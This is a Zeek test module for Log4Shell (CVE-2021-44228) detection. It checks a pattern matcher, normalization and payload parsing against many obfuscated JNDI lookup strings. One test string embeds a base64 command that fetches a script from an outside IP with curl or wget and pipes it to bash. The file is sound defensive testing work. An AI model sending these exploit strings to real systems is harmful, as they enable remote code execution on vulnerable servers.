Patrick Kelley 04da5c1250 Inital
2025-05-28 14:31:31 -04:00


module CVE_2021_44228;
# One table-driven test case for the CVE-2021-44228 (Log4Shell) detection
# logic: an input string plus the results the detector is expected to
# produce for it. The zeek_init() handler in this file compares each field
# against exploit_pattern, normalize() and parse_payload() respectively.
type TestCase: record {
# Raw input string under test.
s: string;
# Expected result of `exploit_pattern in s`.
matches: bool;
# Expected return value of normalize(s).
norm_s: string;
# Expected return value of parse_payload(s); compared with payload_equals().
pp: PayloadParts;
};
function make_test_case(s: string, matches: bool, norm_s: string, uri: string, stem: string, host: string, port_: string): TestCase
	{
	# Build a TestCase from flat arguments. The last four arguments are the
	# expected PayloadParts fields (uri, stem, host, port_) and are wrapped
	# into a PayloadParts record so the caller can write each case on one line.
	return TestCase($s=s,
	                $matches=matches,
	                $norm_s=norm_s,
	                $pp=PayloadParts($uri=uri, $stem=stem, $host=host, $port_=port_));
	}
function payload_equals(p1: PayloadParts, p2: PayloadParts): bool
	{
	# Field-by-field equality of two PayloadParts records. Fields are checked
	# in the order uri, stem, host, port_ and the first mismatch returns F.
	if ( p1$uri != p2$uri )
		return F;

	if ( p1$stem != p2$stem )
		return F;

	if ( p1$host != p2$host )
		return F;

	return p1$port_ == p2$port_;
	}
event zeek_init()
	{
	# Self-test for the CVE-2021-44228 detection helpers. Runs only when
	# run_tests is set. Every check prints a bool that is T when the observed
	# result equals the expected one, so any F in the output marks a failed
	# check. Output order is significant: checks are identified only by their
	# position in the printed sequence.
	if ( run_tests )
		{
		# TODO: Change these to use the table drive tests strategy with `TestCase`

		# False-positive guards: benign strings that contain `${...}` macros
		# (ad-tech GDPR placeholders, PHP-style probes) must NOT match.
		print((exploit_pattern in "https://ad.doubleclick.net/ddm/ad/N5631.507083IPINYOU.COM/B26871807.320905003;sz=1x1;ord=16396029064475833;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}?") == F);
		print((exploit_pattern in "/index.php?s=/module/action/param1/${@Die(md5(HelloThinkPHP))}") == F);
		# NOTE(review): the backslashes in the next literal may be treated as
		# escape sequences by the Zeek lexer -- confirm the string under test
		# is the one intended.
		print((exploit_pattern in "/index?s=index/\think\Module/Action/Param/${@phpinfo()}") == F);

		# Obfuscated lookups (nested lower/upper and default-value forms) are
		# expected to match the raw pattern without prior normalization.
		print((exploit_pattern in "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == T);
		print((exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == T);
		print((exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == T);
		print((exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}") == F);

		# normalize() is expected to collapse nested lookups into the plain
		# `${jndi:ldap://...}` form, including lookups nested inside lookups.
		print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=");
		print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
		print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
		print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}");

		# Stack helper checks. push/peek/pop/clear_stack operate on the
		# module-level `stack`; peek() and pop() on an empty stack are
		# expected to return "".
		local empty_str_vector: vector of string;
		push("1");
		print(stack == vector("1"));
		push("2");
		print(stack == vector("1", "2"));
		push("3");
		print(stack == vector("1", "2", "3"));
		print(peek() == "3");
		print(pop() == "3");
		print(peek() == "2");
		print(pop() == "2");
		print(peek() == "1");
		print(pop() == "1");
		print(peek() == "");
		print(pop() == "");
		push("1");
		push("2");
		push("3");
		print(stack == vector("1", "2", "3"));
		clear_stack();
		print(stack == empty_str_vector);

		# Table-driven cases: (input, expected match, expected normalized
		# form, expected uri, stem, host, port_). A port_ of "-" is the
		# expected value when the payload carries no explicit port.
		local test_cases: vector of TestCase;
		# NOTE(review): the expected norm_s of the first case is not a clean
		# `${jndi:` string; it pins what normalize() currently returns for
		# default-value lookups with multi-segment keys. Confirm this is
		# intended and not a normalization gap the detector depends on.
		test_cases += make_test_case("${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", T, "${jfhv:zyh:c:tvrit:-jt:stfd:vaxokx:qanuv:-ntpr:wqlb:-dyyw:ovptvo:ftzg:bemff:-i:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "-");
		test_cases += make_test_case("${jndi:corbal://0.17.149.63:30123/xvalystgst}", T, "${jndi:corbal://0.17.149.63:30123/xvalystgst}", "0.17.149.63:30123/xvalystgst", "0.17.149.63:30123", "0.17.149.63", "30123");
		test_cases += make_test_case("${jndi:dns://9-99-149-125.example.net/va}", T, "${jndi:dns://9-99-149-125.example.net/va}", "9-99-149-125.example.net/va", "9-99-149-125.example.net", "9-99-149-125.example.net", "-");
		test_cases += make_test_case("${jndi:http://0.8.149.07:30871/xvalystgst}", T, "${jndi:http://0.8.149.07:30871/xvalystgst}", "0.8.149.07:30871/xvalystgst", "0.8.149.07:30871", "0.8.149.07", "30871");
		test_cases += make_test_case("${jndi:iiop://0.96.149.90:08425/xvalystgst}", T, "${jndi:iiop://0.96.149.90:08425/xvalystgst}", "0.96.149.90:08425/xvalystgst", "0.96.149.90:08425", "0.96.149.90", "08425");
		test_cases += make_test_case("${jndi:ldap://.gf8.rv/mmm}", T, "${jndi:ldap://.gf8.rv/mmm}", ".gf8.rv/mmm", ".gf8.rv", ".gf8.rv", "-");
		test_cases += make_test_case("${jndi:ldap://dvuuy_hostnaug./a}", T, "${jndi:ldap://dvuuy_hostnaug./a}", "dvuuy_hostnaug./a", "dvuuy_hostnaug.", "dvuuy_hostnaug.", "-");
		test_cases += make_test_case("${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", T, "${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "-");
		test_cases += make_test_case("${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", T, "${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "-");
		test_cases += make_test_case("${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", T, "${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", "pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk", "pqn.ae:1954", "pqn.ae", "1954");
		test_cases += make_test_case("${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", T, "${jndi:loqgrns://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "-");
		test_cases += make_test_case("${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t", T, "${loqgrndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-dignk_naug:-:}gnk_naug:-l}dgnk_naug:-a}pgnk_naug:-:}//30.137.173.178:5851/q ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t", "30.137.173.178:1954/t", "30.137.173.178:1954", "30.137.173.178", "1954");

		# Per case: echo the input, then check pattern match, normalization
		# and payload parsing, in that order.
		for ( i in test_cases )
			{
			local tc = test_cases[i];
			print(tc$s);
			print((exploit_pattern in tc$s) == tc$matches);
			print(normalize(tc$s) == tc$norm_s);
			print(payload_equals(parse_payload(tc$s), tc$pp));
			}
		}
	}